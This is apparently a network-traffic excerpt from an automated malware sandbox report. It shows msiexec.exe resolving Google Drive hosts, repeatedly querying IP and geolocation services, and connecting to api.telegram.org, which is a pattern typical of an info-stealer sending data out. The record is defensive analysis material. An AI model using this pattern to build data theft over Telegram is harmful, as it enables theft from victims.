Jan 10, 2025 17:17:31.116584063 CET	59372	80	192.168.2.7	132.226.8.169
Jan 10, 2025 17:17:31.355133057 CET	59372	80	192.168.2.7	132.226.8.169
Jan 10, 2025 17:17:31.360924959 CET	80	59372	132.226.8.169	192.168.2.7
Jan 10, 2025 17:17:31.632733107 CET	80	59372	132.226.8.169	192.168.2.7
Jan 10, 2025 17:17:31.679110050 CET	59372	80	192.168.2.7	132.226.8.169
Jan 10, 2025 17:17:31.988446951 CET	59373	443	192.168.2.7	104.21.80.1
Jan 10, 2025 17:17:31.988482952 CET	443	59373	104.21.80.1	192.168.2.7
Jan 10, 2025 17:17:31.988717079 CET	59373	443	192.168.2.7	104.21.80.1
Jan 10, 2025 17:17:31.990896940 CET	59373	443	192.168.2.7	104.21.80.1
Jan 10, 2025 17:17:31.990914106 CET	443	59373	104.21.80.1	192.168.2.7
Jan 10, 2025 17:17:32.465022087 CET	443	59373	104.21.80.1	192.168.2.7
Jan 10, 2025 17:17:32.465219021 CET	59373	443	192.168.2.7	104.21.80.1
Jan 10, 2025 17:17:32.469187021 CET	59373	443	192.168.2.7	104.21.80.1
Jan 10, 2025 17:17:32.469207048 CET	443	59373	104.21.80.1	192.168.2.7
Jan 10, 2025 17:17:32.469543934 CET	443	59373	104.21.80.1	192.168.2.7
Jan 10, 2025 17:17:32.473150015 CET	59373	443	192.168.2.7	104.21.80.1
Jan 10, 2025 17:17:32.519332886 CET	443	59373	104.21.80.1	192.168.2.7
Jan 10, 2025 17:17:32.614835024 CET	443	59373	104.21.80.1	192.168.2.7
Jan 10, 2025 17:17:32.614896059 CET	443	59373	104.21.80.1	192.168.2.7
Jan 10, 2025 17:17:32.615020037 CET	59373	443	192.168.2.7	104.21.80.1
Jan 10, 2025 17:17:32.619368076 CET	59373	443	192.168.2.7	104.21.80.1
Jan 10, 2025 17:17:32.625464916 CET	59372	80	192.168.2.7	132.226.8.169
Jan 10, 2025 17:17:32.630336046 CET	80	59372	132.226.8.169	192.168.2.7
Jan 10, 2025 17:17:32.921567917 CET	80	59372	132.226.8.169	192.168.2.7
Jan 10, 2025 17:17:32.924067974 CET	59374	443	192.168.2.7	104.21.80.1
Jan 10, 2025 17:17:32.924113035 CET	443	59374	104.21.80.1	192.168.2.7
Jan 10, 2025 17:17:32.924221992 CET	59374	443	192.168.2.7	104.21.80.1
Jan 10, 2025 17:17:32.924524069 CET	59374	443	192.168.2.7	104.21.80.1
Jan 10, 2025 17:17:32.924540043 CET	443	59374	104.21.80.1	192.168.2.7
Jan 10, 2025 17:17:32.976159096 CET	59372	80	192.168.2.7	132.226.8.169
Jan 10, 2025 17:17:33.411854982 CET	443	59374	104.21.80.1	192.168.2.7
Jan 10, 2025 17:17:33.414315939 CET	59374	443	192.168.2.7	104.21.80.1
Jan 10, 2025 17:17:33.414344072 CET	443	59374	104.21.80.1	192.168.2.7
Jan 10, 2025 17:17:33.553425074 CET	443	59374	104.21.80.1	192.168.2.7
Jan 10, 2025 17:17:33.553489923 CET	443	59374	104.21.80.1	192.168.2.7
Jan 10, 2025 17:17:33.553808928 CET	59374	443	192.168.2.7	104.21.80.1
Jan 10, 2025 17:17:33.554393053 CET	59374	443	192.168.2.7	104.21.80.1
Jan 10, 2025 17:17:33.558140039 CET	59372	80	192.168.2.7	132.226.8.169
Jan 10, 2025 17:17:33.559221983 CET	59375	80	192.168.2.7	132.226.8.169
Jan 10, 2025 17:17:33.563175917 CET	80	59372	132.226.8.169	192.168.2.7
Jan 10, 2025 17:17:33.563235998 CET	59372	80	192.168.2.7	132.226.8.169
Jan 10, 2025 17:17:33.563939095 CET	80	59375	132.226.8.169	192.168.2.7
Jan 10, 2025 17:17:33.564029932 CET	59375	80	192.168.2.7	132.226.8.169
Jan 10, 2025 17:17:33.564125061 CET	59375	80	192.168.2.7	132.226.8.169
Jan 10, 2025 17:17:33.568878889 CET	80	59375	132.226.8.169	192.168.2.7
Jan 10, 2025 17:17:34.392492056 CET	80	59375	132.226.8.169	192.168.2.7
Jan 10, 2025 17:17:34.393824100 CET	59376	443	192.168.2.7	104.21.80.1
Jan 10, 2025 17:17:34.393857002 CET	443	59376	104.21.80.1	192.168.2.7
Jan 10, 2025 17:17:34.393934011 CET	59376	443	192.168.2.7	104.21.80.1
Jan 10, 2025 17:17:34.394468069 CET	59376	443	192.168.2.7	104.21.80.1
Jan 10, 2025 17:17:34.394481897 CET	443	59376	104.21.80.1	192.168.2.7
Jan 10, 2025 17:17:34.444924116 CET	59375	80	192.168.2.7	132.226.8.169
Jan 10, 2025 17:17:34.852436066 CET	443	59376	104.21.80.1	192.168.2.7
Jan 10, 2025 17:17:34.854523897 CET	59376	443	192.168.2.7	104.21.80.1
Jan 10, 2025 17:17:34.854546070 CET	443	59376	104.21.80.1	192.168.2.7
Jan 10, 2025 17:17:35.017466068 CET	443	59376	104.21.80.1	192.168.2.7
Jan 10, 2025 17:17:35.017524004 CET	443	59376	104.21.80.1	192.168.2.7
Jan 10, 2025 17:17:35.017658949 CET	59376	443	192.168.2.7	104.21.80.1
Jan 10, 2025 17:17:35.018477917 CET	59376	443	192.168.2.7	104.21.80.1
Jan 10, 2025 17:17:35.022509098 CET	59377	80	192.168.2.7	132.226.8.169
Jan 10, 2025 17:17:35.027993917 CET	80	59377	132.226.8.169	192.168.2.7
Jan 10, 2025 17:17:35.028074026 CET	59377	80	192.168.2.7	132.226.8.169
Jan 10, 2025 17:17:35.028141022 CET	59377	80	192.168.2.7	132.226.8.169
Jan 10, 2025 17:17:35.033632994 CET	80	59377	132.226.8.169	192.168.2.7
Jan 10, 2025 17:17:35.893280983 CET	80	59377	132.226.8.169	192.168.2.7
Jan 10, 2025 17:17:35.898669958 CET	59378	443	192.168.2.7	104.21.80.1
Jan 10, 2025 17:17:35.898714066 CET	443	59378	104.21.80.1	192.168.2.7
Jan 10, 2025 17:17:35.898818016 CET	59378	443	192.168.2.7	104.21.80.1
Jan 10, 2025 17:17:35.903575897 CET	59378	443	192.168.2.7	104.21.80.1
Jan 10, 2025 17:17:35.903594971 CET	443	59378	104.21.80.1	192.168.2.7
Jan 10, 2025 17:17:35.944807053 CET	59377	80	192.168.2.7	132.226.8.169
Jan 10, 2025 17:17:36.356761932 CET	443	59378	104.21.80.1	192.168.2.7
Jan 10, 2025 17:17:36.413641930 CET	59378	443	192.168.2.7	104.21.80.1
Jan 10, 2025 17:17:36.441927910 CET	59378	443	192.168.2.7	104.21.80.1
Jan 10, 2025 17:17:36.441941023 CET	443	59378	104.21.80.1	192.168.2.7
Jan 10, 2025 17:17:36.573823929 CET	443	59378	104.21.80.1	192.168.2.7
Jan 10, 2025 17:17:36.573895931 CET	443	59378	104.21.80.1	192.168.2.7
Jan 10, 2025 17:17:36.573987007 CET	59378	443	192.168.2.7	104.21.80.1
Jan 10, 2025 17:17:36.574457884 CET	59378	443	192.168.2.7	104.21.80.1
Jan 10, 2025 17:17:36.672327042 CET	59377	80	192.168.2.7	132.226.8.169
Jan 10, 2025 17:17:36.673196077 CET	59379	80	192.168.2.7	132.226.8.169
Jan 10, 2025 17:17:36.677977085 CET	80	59377	132.226.8.169	192.168.2.7
Jan 10, 2025 17:17:36.678036928 CET	80	59379	132.226.8.169	192.168.2.7
Jan 10, 2025 17:17:36.678055048 CET	59377	80	192.168.2.7	132.226.8.169
Jan 10, 2025 17:17:36.678101063 CET	59379	80	192.168.2.7	132.226.8.169
Jan 10, 2025 17:17:36.678400040 CET	59379	80	192.168.2.7	132.226.8.169
Jan 10, 2025 17:17:36.683187008 CET	80	59379	132.226.8.169	192.168.2.7
Jan 10, 2025 17:17:37.793323040 CET	80	59379	132.226.8.169	192.168.2.7
Jan 10, 2025 17:17:37.795101881 CET	59380	443	192.168.2.7	104.21.80.1
Jan 10, 2025 17:17:37.795161963 CET	443	59380	104.21.80.1	192.168.2.7
Jan 10, 2025 17:17:37.795242071 CET	59380	443	192.168.2.7	104.21.80.1
Jan 10, 2025 17:17:37.795495033 CET	59380	443	192.168.2.7	104.21.80.1
Jan 10, 2025 17:17:37.795506954 CET	443	59380	104.21.80.1	192.168.2.7
Jan 10, 2025 17:17:37.835419893 CET	59379	80	192.168.2.7	132.226.8.169
Jan 10, 2025 17:17:38.278549910 CET	443	59380	104.21.80.1	192.168.2.7
Jan 10, 2025 17:17:38.280376911 CET	59380	443	192.168.2.7	104.21.80.1
Jan 10, 2025 17:17:38.280419111 CET	443	59380	104.21.80.1	192.168.2.7
Jan 10, 2025 17:17:38.421197891 CET	443	59380	104.21.80.1	192.168.2.7
Jan 10, 2025 17:17:38.421263933 CET	443	59380	104.21.80.1	192.168.2.7
Jan 10, 2025 17:17:38.421410084 CET	59380	443	192.168.2.7	104.21.80.1
Jan 10, 2025 17:17:38.421865940 CET	59380	443	192.168.2.7	104.21.80.1
Jan 10, 2025 17:17:38.425110102 CET	59379	80	192.168.2.7	132.226.8.169
Jan 10, 2025 17:17:38.426229000 CET	59381	80	192.168.2.7	132.226.8.169
Jan 10, 2025 17:17:38.430075884 CET	80	59379	132.226.8.169	192.168.2.7
Jan 10, 2025 17:17:38.430154085 CET	59379	80	192.168.2.7	132.226.8.169
Jan 10, 2025 17:17:38.431119919 CET	80	59381	132.226.8.169	192.168.2.7
Jan 10, 2025 17:17:38.431189060 CET	59381	80	192.168.2.7	132.226.8.169
Jan 10, 2025 17:17:38.431283951 CET	59381	80	192.168.2.7	132.226.8.169
Jan 10, 2025 17:17:38.436108112 CET	80	59381	132.226.8.169	192.168.2.7
Jan 10, 2025 17:17:39.307950020 CET	80	59381	132.226.8.169	192.168.2.7
Jan 10, 2025 17:17:39.351028919 CET	59381	80	192.168.2.7	132.226.8.169
Jan 10, 2025 17:17:39.413837910 CET	59382	443	192.168.2.7	104.21.80.1
Jan 10, 2025 17:17:39.413892984 CET	443	59382	104.21.80.1	192.168.2.7
Jan 10, 2025 17:17:39.413978100 CET	59382	443	192.168.2.7	104.21.80.1
Jan 10, 2025 17:17:39.418011904 CET	59382	443	192.168.2.7	104.21.80.1
Jan 10, 2025 17:17:39.418031931 CET	443	59382	104.21.80.1	192.168.2.7
Jan 10, 2025 17:17:39.871860981 CET	443	59382	104.21.80.1	192.168.2.7
Jan 10, 2025 17:17:39.892493010 CET	59382	443	192.168.2.7	104.21.80.1
Jan 10, 2025 17:17:39.892513990 CET	443	59382	104.21.80.1	192.168.2.7
Jan 10, 2025 17:17:40.018439054 CET	443	59382	104.21.80.1	192.168.2.7
Jan 10, 2025 17:17:40.018543005 CET	443	59382	104.21.80.1	192.168.2.7
Jan 10, 2025 17:17:40.018582106 CET	59382	443	192.168.2.7	104.21.80.1
Jan 10, 2025 17:17:40.020356894 CET	59382	443	192.168.2.7	104.21.80.1
Jan 10, 2025 17:17:40.027662992 CET	59381	80	192.168.2.7	132.226.8.169
Jan 10, 2025 17:17:40.028477907 CET	59383	80	192.168.2.7	132.226.8.169
Jan 10, 2025 17:17:40.032741070 CET	80	59381	132.226.8.169	192.168.2.7
Jan 10, 2025 17:17:40.032793045 CET	59381	80	192.168.2.7	132.226.8.169
Jan 10, 2025 17:17:40.033348083 CET	80	59383	132.226.8.169	192.168.2.7
Jan 10, 2025 17:17:40.033406019 CET	59383	80	192.168.2.7	132.226.8.169
Jan 10, 2025 17:17:40.041066885 CET	59383	80	192.168.2.7	132.226.8.169
Jan 10, 2025 17:17:40.045938015 CET	80	59383	132.226.8.169	192.168.2.7
Jan 10, 2025 17:17:40.874217033 CET	80	59383	132.226.8.169	192.168.2.7
Jan 10, 2025 17:17:40.875569105 CET	59384	443	192.168.2.7	104.21.80.1
Jan 10, 2025 17:17:40.875622034 CET	443	59384	104.21.80.1	192.168.2.7
Jan 10, 2025 17:17:40.875689983 CET	59384	443	192.168.2.7	104.21.80.1
Jan 10, 2025 17:17:40.875932932 CET	59384	443	192.168.2.7	104.21.80.1
Jan 10, 2025 17:17:40.875951052 CET	443	59384	104.21.80.1	192.168.2.7
Jan 10, 2025 17:17:40.929205894 CET	59383	80	192.168.2.7	132.226.8.169
Jan 10, 2025 17:17:41.329605103 CET	443	59384	104.21.80.1	192.168.2.7
Jan 10, 2025 17:17:41.331145048 CET	59384	443	192.168.2.7	104.21.80.1
Jan 10, 2025 17:17:41.331183910 CET	443	59384	104.21.80.1	192.168.2.7
Jan 10, 2025 17:17:41.477401018 CET	443	59384	104.21.80.1	192.168.2.7
Jan 10, 2025 17:17:41.477462053 CET	443	59384	104.21.80.1	192.168.2.7
Jan 10, 2025 17:17:41.477520943 CET	59384	443	192.168.2.7	104.21.80.1
Jan 10, 2025 17:17:41.477932930 CET	59384	443	192.168.2.7	104.21.80.1
Jan 10, 2025 17:17:41.481112957 CET	59383	80	192.168.2.7	132.226.8.169
Jan 10, 2025 17:17:41.482656002 CET	59385	80	192.168.2.7	132.226.8.169
Jan 10, 2025 17:17:41.486064911 CET	80	59383	132.226.8.169	192.168.2.7
Jan 10, 2025 17:17:41.486141920 CET	59383	80	192.168.2.7	132.226.8.169
Jan 10, 2025 17:17:41.487484932 CET	80	59385	132.226.8.169	192.168.2.7
Jan 10, 2025 17:17:41.488456964 CET	59385	80	192.168.2.7	132.226.8.169
Jan 10, 2025 17:17:41.488456964 CET	59385	80	192.168.2.7	132.226.8.169
Jan 10, 2025 17:17:41.493200064 CET	80	59385	132.226.8.169	192.168.2.7
Jan 10, 2025 17:17:42.309870958 CET	80	59385	132.226.8.169	192.168.2.7
Jan 10, 2025 17:17:42.311073065 CET	59386	443	192.168.2.7	104.21.80.1
Jan 10, 2025 17:17:42.311120033 CET	443	59386	104.21.80.1	192.168.2.7
Jan 10, 2025 17:17:42.311187983 CET	59386	443	192.168.2.7	104.21.80.1
Jan 10, 2025 17:17:42.311408997 CET	59386	443	192.168.2.7	104.21.80.1
Jan 10, 2025 17:17:42.311424971 CET	443	59386	104.21.80.1	192.168.2.7
Jan 10, 2025 17:17:42.351119041 CET	59385	80	192.168.2.7	132.226.8.169
Jan 10, 2025 17:17:42.776762009 CET	443	59386	104.21.80.1	192.168.2.7
Jan 10, 2025 17:17:42.781291962 CET	59386	443	192.168.2.7	104.21.80.1
Jan 10, 2025 17:17:42.781311989 CET	443	59386	104.21.80.1	192.168.2.7
Jan 10, 2025 17:17:42.933187008 CET	443	59386	104.21.80.1	192.168.2.7
Jan 10, 2025 17:17:42.933273077 CET	443	59386	104.21.80.1	192.168.2.7
Jan 10, 2025 17:17:42.933322906 CET	59386	443	192.168.2.7	104.21.80.1
Jan 10, 2025 17:17:42.939680099 CET	59386	443	192.168.2.7	104.21.80.1
Jan 10, 2025 17:17:43.111886024 CET	59385	80	192.168.2.7	132.226.8.169
Jan 10, 2025 17:17:43.112915039 CET	59387	80	192.168.2.7	132.226.8.169
Jan 10, 2025 17:17:43.116839886 CET	80	59385	132.226.8.169	192.168.2.7
Jan 10, 2025 17:17:43.117115974 CET	59385	80	192.168.2.7	132.226.8.169
Jan 10, 2025 17:17:43.117732048 CET	80	59387	132.226.8.169	192.168.2.7
Jan 10, 2025 17:17:43.117873907 CET	59387	80	192.168.2.7	132.226.8.169
Jan 10, 2025 17:17:43.117873907 CET	59387	80	192.168.2.7	132.226.8.169
Jan 10, 2025 17:17:43.122667074 CET	80	59387	132.226.8.169	192.168.2.7
Jan 10, 2025 17:17:43.970401049 CET	80	59387	132.226.8.169	192.168.2.7
Jan 10, 2025 17:17:43.971704006 CET	59388	443	192.168.2.7	104.21.80.1
Jan 10, 2025 17:17:43.971750021 CET	443	59388	104.21.80.1	192.168.2.7
Jan 10, 2025 17:17:43.971827984 CET	59388	443	192.168.2.7	104.21.80.1
Jan 10, 2025 17:17:43.972069025 CET	59388	443	192.168.2.7	104.21.80.1
Jan 10, 2025 17:17:43.972083092 CET	443	59388	104.21.80.1	192.168.2.7
Jan 10, 2025 17:17:44.022914886 CET	59387	80	192.168.2.7	132.226.8.169
Jan 10, 2025 17:17:44.441827059 CET	443	59388	104.21.80.1	192.168.2.7
Jan 10, 2025 17:17:44.443561077 CET	59388	443	192.168.2.7	104.21.80.1
Jan 10, 2025 17:17:44.443581104 CET	443	59388	104.21.80.1	192.168.2.7
Jan 10, 2025 17:17:44.605806112 CET	443	59388	104.21.80.1	192.168.2.7
Jan 10, 2025 17:17:44.606307030 CET	443	59388	104.21.80.1	192.168.2.7
Jan 10, 2025 17:17:44.606364965 CET	59388	443	192.168.2.7	104.21.80.1
Jan 10, 2025 17:17:44.606792927 CET	59388	443	192.168.2.7	104.21.80.1
Jan 10, 2025 17:17:44.631685019 CET	59387	80	192.168.2.7	132.226.8.169
Jan 10, 2025 17:17:44.636787891 CET	80	59387	132.226.8.169	192.168.2.7
Jan 10, 2025 17:17:44.636925936 CET	59387	80	192.168.2.7	132.226.8.169
Jan 10, 2025 17:17:44.639570951 CET	59389	443	192.168.2.7	149.154.167.220
Jan 10, 2025 17:17:44.639611959 CET	443	59389	149.154.167.220	192.168.2.7
Jan 10, 2025 17:17:44.639672041 CET	59389	443	192.168.2.7	149.154.167.220
Jan 10, 2025 17:17:44.640052080 CET	59389	443	192.168.2.7	149.154.167.220
Jan 10, 2025 17:17:44.640063047 CET	443	59389	149.154.167.220	192.168.2.7
Jan 10, 2025 17:17:45.260929108 CET	443	59389	149.154.167.220	192.168.2.7
Jan 10, 2025 17:17:45.261064053 CET	59389	443	192.168.2.7	149.154.167.220
Jan 10, 2025 17:17:45.263329983 CET	59389	443	192.168.2.7	149.154.167.220
Jan 10, 2025 17:17:45.263346910 CET	443	59389	149.154.167.220	192.168.2.7
Jan 10, 2025 17:17:45.263597012 CET	443	59389	149.154.167.220	192.168.2.7
Jan 10, 2025 17:17:45.265517950 CET	59389	443	192.168.2.7	149.154.167.220
Jan 10, 2025 17:17:45.307344913 CET	443	59389	149.154.167.220	192.168.2.7
Jan 10, 2025 17:17:45.508671045 CET	443	59389	149.154.167.220	192.168.2.7
Jan 10, 2025 17:17:45.508749008 CET	443	59389	149.154.167.220	192.168.2.7
Jan 10, 2025 17:17:45.508797884 CET	59389	443	192.168.2.7	149.154.167.220
Jan 10, 2025 17:17:45.511564016 CET	59389	443	192.168.2.7	149.154.167.220
Jan 10, 2025 17:17:51.428757906 CET	59375	80	192.168.2.7	132.226.8.169
Jan 10, 2025 17:17:51.641355991 CET	59390	443	192.168.2.7	149.154.167.220
Jan 10, 2025 17:17:51.641392946 CET	443	59390	149.154.167.220	192.168.2.7
Jan 10, 2025 17:17:51.641469002 CET	59390	443	192.168.2.7	149.154.167.220
Jan 10, 2025 17:17:51.641760111 CET	59390	443	192.168.2.7	149.154.167.220
Jan 10, 2025 17:17:51.641776085 CET	443	59390	149.154.167.220	192.168.2.7
Jan 10, 2025 17:17:52.312544107 CET	443	59390	149.154.167.220	192.168.2.7
Jan 10, 2025 17:17:52.314609051 CET	59390	443	192.168.2.7	149.154.167.220
Jan 10, 2025 17:17:52.314635992 CET	443	59390	149.154.167.220	192.168.2.7
Jan 10, 2025 17:17:52.314692974 CET	59390	443	192.168.2.7	149.154.167.220
Jan 10, 2025 17:17:52.314702034 CET	443	59390	149.154.167.220	192.168.2.7
Jan 10, 2025 17:17:52.781054974 CET	443	59390	149.154.167.220	192.168.2.7
Jan 10, 2025 17:17:52.781152964 CET	443	59390	149.154.167.220	192.168.2.7
Jan 10, 2025 17:17:52.781224966 CET	59390	443	192.168.2.7	149.154.167.220
Jan 10, 2025 17:17:52.781594992 CET	59390	443	192.168.2.7	149.154.167.220
Jan 10, 2025 17:17:54.302210093 CET	59391	443	192.168.2.7	149.154.167.220
Jan 10, 2025 17:17:54.302259922 CET	443	59391	149.154.167.220	192.168.2.7
Jan 10, 2025 17:17:54.302339077 CET	59391	443	192.168.2.7	149.154.167.220
Jan 10, 2025 17:17:54.302580118 CET	59391	443	192.168.2.7	149.154.167.220
Jan 10, 2025 17:17:54.302591085 CET	443	59391	149.154.167.220	192.168.2.7
Jan 10, 2025 17:17:54.938596964 CET	443	59391	149.154.167.220	192.168.2.7
Jan 10, 2025 17:17:54.940761089 CET	59391	443	192.168.2.7	149.154.167.220
Jan 10, 2025 17:17:54.940788984 CET	443	59391	149.154.167.220	192.168.2.7
Jan 10, 2025 17:17:54.940867901 CET	59391	443	192.168.2.7	149.154.167.220
Jan 10, 2025 17:17:54.940872908 CET	443	59391	149.154.167.220	192.168.2.7
Jan 10, 2025 17:17:55.367031097 CET	443	59391	149.154.167.220	192.168.2.7
Jan 10, 2025 17:17:55.367115021 CET	443	59391	149.154.167.220	192.168.2.7
Jan 10, 2025 17:17:55.367333889 CET	59391	443	192.168.2.7	149.154.167.220
Jan 10, 2025 17:17:55.367594004 CET	59391	443	192.168.2.7	149.154.167.220

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 10, 2025 17:15:54.950998068 CET	53	62604	162.159.36.2	192.168.2.7
Jan 10, 2025 17:15:55.430579901 CET	53	62568	1.1.1.1	192.168.2.7
Jan 10, 2025 17:17:25.506494045 CET	62243	53	192.168.2.7	1.1.1.1
Jan 10, 2025 17:17:25.514187098 CET	53	62243	1.1.1.1	192.168.2.7
Jan 10, 2025 17:17:26.622594118 CET	52228	53	192.168.2.7	1.1.1.1
Jan 10, 2025 17:17:26.630315065 CET	53	52228	1.1.1.1	192.168.2.7
Jan 10, 2025 17:17:30.217174053 CET	52346	53	192.168.2.7	1.1.1.1
Jan 10, 2025 17:17:30.223922014 CET	53	52346	1.1.1.1	192.168.2.7
Jan 10, 2025 17:17:31.980509996 CET	57003	53	192.168.2.7	1.1.1.1
Jan 10, 2025 17:17:31.987757921 CET	53	57003	1.1.1.1	192.168.2.7
Jan 10, 2025 17:17:44.632281065 CET	51191	53	192.168.2.7	1.1.1.1
Jan 10, 2025 17:17:44.639070988 CET	53	51191	1.1.1.1	192.168.2.7

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jan 10, 2025 17:17:25.506494045 CET	192.168.2.7	1.1.1.1	0xf276	Standard query (0)	drive.google.com	A (IP address)	IN (0x0001)	false
Jan 10, 2025 17:17:26.622594118 CET	192.168.2.7	1.1.1.1	0x64d9	Standard query (0)	drive.usercontent.google.com	A (IP address)	IN (0x0001)	false
Jan 10, 2025 17:17:30.217174053 CET	192.168.2.7	1.1.1.1	0x6c2b	Standard query (0)	checkip.dyndns.org	A (IP address)	IN (0x0001)	false
Jan 10, 2025 17:17:31.980509996 CET	192.168.2.7	1.1.1.1	0x32ac	Standard query (0)	reallyfreegeoip.org	A (IP address)	IN (0x0001)	false
Jan 10, 2025 17:17:44.632281065 CET	192.168.2.7	1.1.1.1	0x62b5	Standard query (0)	api.telegram.org	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jan 10, 2025 17:17:25.514187098 CET	1.1.1.1	192.168.2.7	0xf276	No error (0)	drive.google.com		216.58.206.46	A (IP address)	IN (0x0001)	false
Jan 10, 2025 17:17:26.630315065 CET	1.1.1.1	192.168.2.7	0x64d9	No error (0)	drive.usercontent.google.com		142.250.186.129	A (IP address)	IN (0x0001)	false
Jan 10, 2025 17:17:30.223922014 CET	1.1.1.1	192.168.2.7	0x6c2b	No error (0)	checkip.dyndns.org	checkip.dyndns.com		CNAME (Canonical name)	IN (0x0001)	false
Jan 10, 2025 17:17:30.223922014 CET	1.1.1.1	192.168.2.7	0x6c2b	No error (0)	checkip.dyndns.com		132.226.8.169	A (IP address)	IN (0x0001)	false
Jan 10, 2025 17:17:30.223922014 CET	1.1.1.1	192.168.2.7	0x6c2b	No error (0)	checkip.dyndns.com		193.122.130.0	A (IP address)	IN (0x0001)	false
Jan 10, 2025 17:17:30.223922014 CET	1.1.1.1	192.168.2.7	0x6c2b	No error (0)	checkip.dyndns.com		158.101.44.242	A (IP address)	IN (0x0001)	false
Jan 10, 2025 17:17:30.223922014 CET	1.1.1.1	192.168.2.7	0x6c2b	No error (0)	checkip.dyndns.com		132.226.247.73	A (IP address)	IN (0x0001)	false
Jan 10, 2025 17:17:30.223922014 CET	1.1.1.1	192.168.2.7	0x6c2b	No error (0)	checkip.dyndns.com		193.122.6.168	A (IP address)	IN (0x0001)	false
Jan 10, 2025 17:17:31.987757921 CET	1.1.1.1	192.168.2.7	0x32ac	No error (0)	reallyfreegeoip.org		104.21.80.1	A (IP address)	IN (0x0001)	false
Jan 10, 2025 17:17:31.987757921 CET	1.1.1.1	192.168.2.7	0x32ac	No error (0)	reallyfreegeoip.org		104.21.32.1	A (IP address)	IN (0x0001)	false
Jan 10, 2025 17:17:31.987757921 CET	1.1.1.1	192.168.2.7	0x32ac	No error (0)	reallyfreegeoip.org		104.21.112.1	A (IP address)	IN (0x0001)	false
Jan 10, 2025 17:17:31.987757921 CET	1.1.1.1	192.168.2.7	0x32ac	No error (0)	reallyfreegeoip.org		104.21.48.1	A (IP address)	IN (0x0001)	false
Jan 10, 2025 17:17:31.987757921 CET	1.1.1.1	192.168.2.7	0x32ac	No error (0)	reallyfreegeoip.org		104.21.64.1	A (IP address)	IN (0x0001)	false
Jan 10, 2025 17:17:31.987757921 CET	1.1.1.1	192.168.2.7	0x32ac	No error (0)	reallyfreegeoip.org		104.21.16.1	A (IP address)	IN (0x0001)	false
Jan 10, 2025 17:17:31.987757921 CET	1.1.1.1	192.168.2.7	0x32ac	No error (0)	reallyfreegeoip.org		104.21.96.1	A (IP address)	IN (0x0001)	false
Jan 10, 2025 17:17:44.639070988 CET	1.1.1.1	192.168.2.7	0x62b5	No error (0)	api.telegram.org		149.154.167.220	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

drive.google.com

drive.usercontent.google.com

reallyfreegeoip.org

api.telegram.org

checkip.dyndns.org

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.7	59372	132.226.8.169	80	7864	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 17:17:30.233901024 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 10, 2025 17:17:31.071775913 CET	273	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 16:17:30 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
Jan 10, 2025 17:17:31.355133057 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Jan 10, 2025 17:17:31.632733107 CET	273	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 16:17:31 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
Jan 10, 2025 17:17:32.625464916 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Jan 10, 2025 17:17:32.921567917 CET	273	IN	HTTP/1.1 200 OK Date: Fri, 10 Jan 2025 16:17:32 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.7	59375	132.226.8.169	80	7864	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 17:17:33.564125061 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
